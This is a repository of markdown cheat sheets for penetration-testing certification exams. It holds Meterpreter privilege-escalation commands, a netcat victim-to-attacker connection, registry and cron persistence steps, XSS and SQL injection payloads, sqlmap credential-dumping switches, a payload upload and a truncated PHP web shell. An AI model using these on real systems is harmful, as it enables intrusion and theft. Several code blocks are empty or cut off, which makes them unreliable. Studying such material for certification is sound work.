├── .gitattributes ├── README.md ├── mySQLcommands.md ├── metasploit and meterpreter.md ├── passwordCracking.md ├── backDoorTools.md ├── eCPPT Tools.md ├── eJPT-Tools.md └── WebAttacks.md /.gitattributes: -------------------------------------------------------------------------------- 1 | # Auto detect text files and perform LF normalization 2 | * text=auto 3 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # eJPT Exam Tools 2 | 3 | 4 | ### By Daniel Arlington 5 | 6 | This is a collection of tools and commands to use during the eJPT Exam. 7 | -------------------------------------------------------------------------------- /mySQLcommands.md: -------------------------------------------------------------------------------- 1 | # MySql Basic Commands 2 | 3 | [MySql Cheat Sheet] (https://gist.github.com/hofmannsven/9164408) 4 | 5 | 6 | [MySql Basic Commands] (http://g2pc1.bu.edu/~qzpeng/manual/MySQL%20Commands.htm) 7 | -------------------------------------------------------------------------------- /metasploit and meterpreter.md: -------------------------------------------------------------------------------- 1 | # Metasploit and Meterpreter Tips 2 | 3 | Before starting Metasploit 4 | 5 | ``` 6 | $service postgresql start 7 | ``` 8 | 9 | 10 | ## Metasploit 11 | 12 | Commands 13 | * Search -h 14 | 15 | Do an arp scan 16 | * arp_sweep 17 | * portscan 18 | 19 | 20 | ## Meterpreter 21 | 22 | Commands 23 | * Help or "?" 24 | * Background 25 | * Sessions -i 1 (Session ID) 26 | * Sysinfo 27 | * Getpid (To get current pid) 28 | * Download FILENAME /root/ 29 | * Getsystem 30 | * run post/windows/gather/win_privs (Check user priviledges) 31 | * Bypassuac 32 | * ps -U SYSTEM (Gets Processes run by the SYSTEM) 33 | 34 | Try to migrate to a diffferent process 35 | 36 | * migrate NEWPID (Migrates to the new PID) 37 | 38 | 39 | 40 | -------------------------------------------------------------------------------- /passwordCracking.md: -------------------------------------------------------------------------------- 1 | # Password Cracking Tools 2 | 3 | ## John The Ripper 4 | 5 | Used to crack 6 | 7 | * /etc/passwd 8 | * /etc/shadow 9 | 10 | First unshadow files 11 | ``` 12 | $unshadow passwd shadow > outpuhashes.file 13 | ``` 14 | 15 | ``` 16 | $john --wordlist=/usr/share/john/password.lst hashes.file 17 | ``` 18 | 19 | ## Rainbow Tables / Ophcrack 20 | 21 | 22 | ## Hashcat 23 | 24 | Hashcat Switches 25 | 26 | * -m Hashes Modes/Types 27 | * -a Attack type 28 | * -o Output to a file 29 | * -b Run a benchmark 30 | * -d Specify the device 31 | * -O Optimize performance 32 | 33 | 34 | ## Hydra 35 | 36 | Hydra module information 37 | 38 | ``` 39 | $hydra -U rdp 40 | $hydra -U http-get 41 | $hydra -U http-form-post 42 | ``` 43 | 44 | -------------------------------------------------------------------------------- /backDoorTools.md: -------------------------------------------------------------------------------- 1 | # Backdoor tools 2 | 3 | ## Netcat, ncat, nc 4 | 5 | * Ncat 6 | Switches 7 | 8 | * -l Listening 9 | * -e, --exec Execute command (E.g, /bin/bash, cmd.exe) 10 | * -p Port 11 | * -v Verbose 12 | * -n Do not resolve hostname via DNS (Numbers only) 13 | 14 | Victim Computer 15 | ``` 16 | $ncat -nv HOST -p 1234 17 | ``` 18 | 19 | Attacker Computer 20 | ``` 21 | $ncat -lnvp 1234 22 | ``` 23 | 24 | 25 | ## Install Persistant Backdoor 26 | 27 | Windows Registery 28 | 29 | ``` 30 | Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 31 | 32 | Add string Values 33 | ``` 34 | 35 | Linux Cron 36 | 37 | ``` 38 | Add the command in Crontab 39 | ``` 40 | 41 | -------------------------------------------- 42 | 43 | ## Exfiltration Tecnhiques and Tools 44 | 45 | * PacketWhisper.py 46 | * Netcat file redirection 47 | * Scp (Secure copy) 48 | * Simple_http_server.py (Python module) 49 | 50 | -------------------------------------------------------------------------------- /eCPPT Tools.md: -------------------------------------------------------------------------------- 1 | ## eCPPT Tools 2 | 3 | 4 | SSRF Example 5 | 6 | ``` 7 | In this example, the attacker can control the server's subdomain to which the request is made. Take note of the payload ending in &x= being used to stop the remaining path from being appended to the end of the attacker's URL and instead turns it into a parameter (?x=) on the query string. Next 8 | ``` 9 | 10 | XSS Example 11 | 12 | ``` 13 | 14 | 15 | ``` 16 | 17 | Cookie stealing 18 | ``` 19 | 20 | 21 | ``` 22 | 23 | Closign the input tag 24 | ``` 25 | The important part of the payload is the "> which closes the value parameter and then closes the input tag. 26 | 27 | ``` 28 | 29 | Polyglots 30 | 31 | ``` 32 | jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */onerror=alert('THM') )//%0D%0A%0d%0a//\x3csVg/\x3e 33 | 34 | ``` 35 | 36 | Fetch Cookie using Javascript 37 | 38 | ``` 39 | 40 | 41 | ``` 42 | 43 | 44 | 45 | # Post Exploitation Linux 46 | 47 | * 3snake 48 | * Bettercap 49 | 50 | 51 | -------------------------------------------------------------------------------- /eJPT-Tools.md: -------------------------------------------------------------------------------- 1 | # eJPT Tools 2 | My list of tools for the eJPT exam. 3 | 4 | ## List of Well-known Ports 5 | 6 | * SSH (22) 7 | * SMTP (25) 8 | * POP3 (110) 9 | * IMAP (143) 10 | * HTTP/S (80, 443) 11 | * NETBIOS WINS/SMB 137 (Enumerate workgroups), 138 (Enumerate Shares and machines), 139/445 (Transmit data such as files, etc)) 12 | * SFTP (115) 13 | * Telnet (23) 14 | * FTP Communication/DataTransfer (21, 20) 15 | * RDP (3389) 16 | * MySQL (3306) 17 | * MS SQL Server (1433) 18 | 19 | 20 | ## Common Tools/Commands 21 | 22 | * netstat -tunp 23 | * ARP checks 24 | - arp -a 25 | - ip neighbour 26 | - Arpspoof 27 | ``` 28 | $arpspoof -i tap0 -t SERVERADDRESS -r CLIENTADDRESS 29 | ``` 30 | * nsloookup 31 | * whois 32 | * sublist3r -d [domain] 33 | 34 | 35 | ## Network Scanning Tools 36 | 37 | 1. fping -a -g [IPRANGE] 2>/dev/null > output.txt 38 | 39 | 2. Nmap 40 | * -sn (ping scan) 41 | * -sT (TCP connect scan) 42 | * -sS (SYN only scan, Stealthy) 43 | * -iL [fileList] 44 | * -Pn (Treat all hosts as online) 45 | * -O (OS Detection Enabled) 46 | * -sV (Version detection scan) 47 | 48 | ## Vulnerability Scanning Tools 49 | 50 | 3. Nessus 51 | 52 | 4. OpenVAS 53 | 54 | ## Web Application Scanning Tools 55 | 56 | 5. BurpSuite 57 | * java -jar [BurpsuiteOlderVersions.jar] 58 | 59 | 6. ZAP 60 | * Use for Spidering Tool 61 | 62 | 63 | ## Windows SMB Scanning 64 | 65 | 7. enum4linux 66 | 67 | Important Switches 68 | 69 | * -a Run all options (USGProni) 70 | * -n nmblookup 71 | * -U enumerate userlist 72 | * -P Enumerate password policy 73 | * -S Enumerate sharelist 74 | * -s Share bruteforce 75 | ``` 76 | $enum4linux -s /usr/share/enum4linux/share-list.txt IPADDRESS 77 | ``` 78 | 79 | 8. Impacket Tools - samrdump 80 | 81 | 9. SMBClient 82 | 83 | ``` 84 | $smbclient -L //IPADDRESS/ -N (List shares, no password required) 85 | $smbclient -L WORKGROUP -I IPADDRESS -N -U "" (no pass, no user) 86 | $smbclient \\\\IPADDRESS\\SHARE -N (Connect to SMB interactively) 87 | ``` 88 | 89 | 10. Nmap for SMB Shares Scripts 90 | 91 | ``` 92 | $nmap -script=smb-enum-shares IPADDRESS 93 | $nmap -script=smb-enum-users IPADDRESS 94 | $nmap -script=smb-enum* IPADDRESS (Using wildcard) 95 | $nmap -script=smb-brute IPADDRESS 96 | ``` -------------------------------------------------------------------------------- /WebAttacks.md: -------------------------------------------------------------------------------- 1 | # Web Application Tools 2 | My list of Web Application tools for the eJPT exam. 3 | 4 | ------------------------------------- 5 | 6 | ## *HTTP Protocol and Fingerprinting* 7 | 8 | 1. Netcat 9 | * nc [targetAddress] 80 10 | 11 | 2. OpenSSL s_client -connect [targetAddress:443] 12 | 13 | 3. httprint -P0 -h [targetAddress] -s /usr/share/httprint/signatures.txt 14 | 15 | ------------------------------------- 16 | 17 | ## *HTTP Verbs - Use in Burpsuite* 18 | 19 | ### (Can be used on misconfigured web servers) 20 | 21 | - GET - Request a webpage 22 | - HEAD - Request Header information 23 | - POST - Post form data (eg, username, password) 24 | - PUT - Create an arbitrary file on the server 25 | - DELETE - Delete/remove file from the server 26 | - OPTIONS - Check communications option 27 | 28 | "GET" Example: 29 | 30 | GET /page.php?comman=pwd HTTP/1.1 31 | Host: www.host.com 32 | 33 | 34 | "POST" Example: 35 | 36 | POST /login.php? HTTP/1.1 37 | Host: www.host.com 38 | 39 | 40 | username=admin&password=1234 41 | 42 | 43 | "DELETE" Example: 44 | 45 | DELETE /wp-content/imp.file HTTP/1.1 46 | Host: www.host.com 47 | 48 | "PUT" Example: 49 | 50 | $wc -m payload.php 51 | 20 payload.php 52 | 53 | $nc [targetAddress] 80 54 | PUT /payload.php HTTP/1.0 55 | Content-type: text/html 56 | Content-length: 20 57 | 58 | 59 | 60 | 61 | ------------------------------------- 62 | 63 | ## *Dirbuster(GUI)/Gobuster/Dirb* 64 | 65 | * Search for interesting file types 66 | * php 67 | * txt 68 | * bak 69 | * old 70 | 71 | $gobuster dir --url http://host.com/ -w /path/to/word.list -x php,txt,old,bak -o output.txt 72 | 73 | $dirb http://host.com/ /path/to/word.list -X php,txt,bak,old -o output.txt 74 | 75 | $dirb https://host.com/ (Simple SSL test) 76 | 77 | *Tips: Searh for **Signup pages** and **old configuration files.*** 78 | 79 | ------------------------------------- 80 | 81 | ## Cross-Site Scripting 82 | 83 | * Session Cookies 84 | * document.cookie - This is where the cookies are stored 85 | 86 | *Display cookie as an alert* 87 | ``` 88 | [] 89 | ``` 90 | *Victim's Browser* <--- **Inject this piece of code!** 91 | ``` 92 | 96 | ``` 97 | 98 | *Attacker's Computer* 99 | ``` 100 | 107 | ``` 108 | *Alternate code* 109 | 110 | ``` 111 | 121 | ``` 122 | ------------------------------------- 123 | ## SQL-Injection 124 | 125 | *Tip: Look at the source code to check for any IDs such as src="images/***els1***"!* 126 | * SQL Statements 127 | 128 | ``` 129 | SELECT * FROM table WHERE ; 130 | ``` 131 | 132 | Putting comments in statements 133 | ``` 134 | # Hash symbol 135 | -- Double hyphens followed by a whitespace (add a space and another hyphen "-- -") 136 | 137 | Select * FROM table; # Comment 138 | Select * FROM table; -- Another comment 139 | ``` 140 | 141 | * BOOLEAN Attacks 142 | 143 | ```` 144 | SELECT * FROM items WHERE id='' OR '1' = '1'; -- -' 145 | ```` 146 | 147 | * Union Attacks 148 | 149 | ``` 150 | SELECT * FROM items WHERE id='' UNION SELECT null, null, null; -- -' 151 | ``` 152 | 153 | ## SQLmap switches 154 | 155 | ``` 156 | Example: 157 | 158 | $sqlmap -u "http://10.10.10.10/get.php?id=1234" -p id --technique=U 159 | 160 | $sqlmap -u "http://10.10.10.10/login.php" --data "username=admin&password=1234" -p username --technique=B --banner 161 | ``` 162 | 163 | * -u URL 164 | * -p vulnerable parameter 165 | * --data data to be sent through a POST request (username=admin&password=1234) 166 | * --banner Retrieve DBMS banner 167 | * --users Enumerate DBMS users 168 | * --passwords Enumerate DBMS Users hashed passwords 169 | * --dbs Enumerate DBMS databases 170 | * -D Database to enumerate (insert found database name) 171 | * --tables Enumerates tables in the given database name 172 | * -T Table name to enumerate (insert table name. E.g, Users, Accounts, etc) 173 | * --columns Enumerate table columns 174 | * -C Column name to enumerate (E.g., -C username,password) 175 | * --dump Dumps all the table entries 176 | * -r Load HTTP request from a file (Save the request from Burpsuite) 177 | * --flush-session (Flushes the session files for the current target. Restarts the session again) 178 | 179 | 180 | 181 | 182 | 183 | ------------------------------------- 184 | 185 | ## *Reverse Shell Links* 186 | 187 | [Pentest Monkey Website] (http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet) 188 | 189 | [GTFOBins Website] (https://gtfobins.github.io/) 190 | 191 | 192 | Example PHP Reverse Shell: 193 | 194 | '; 199 | $result = shell_exec($cmd); 200 | echo $result; 201 | echo ''; 202 | } 203 | ?> 204 | 205 | --------------------------------------------------------------------------------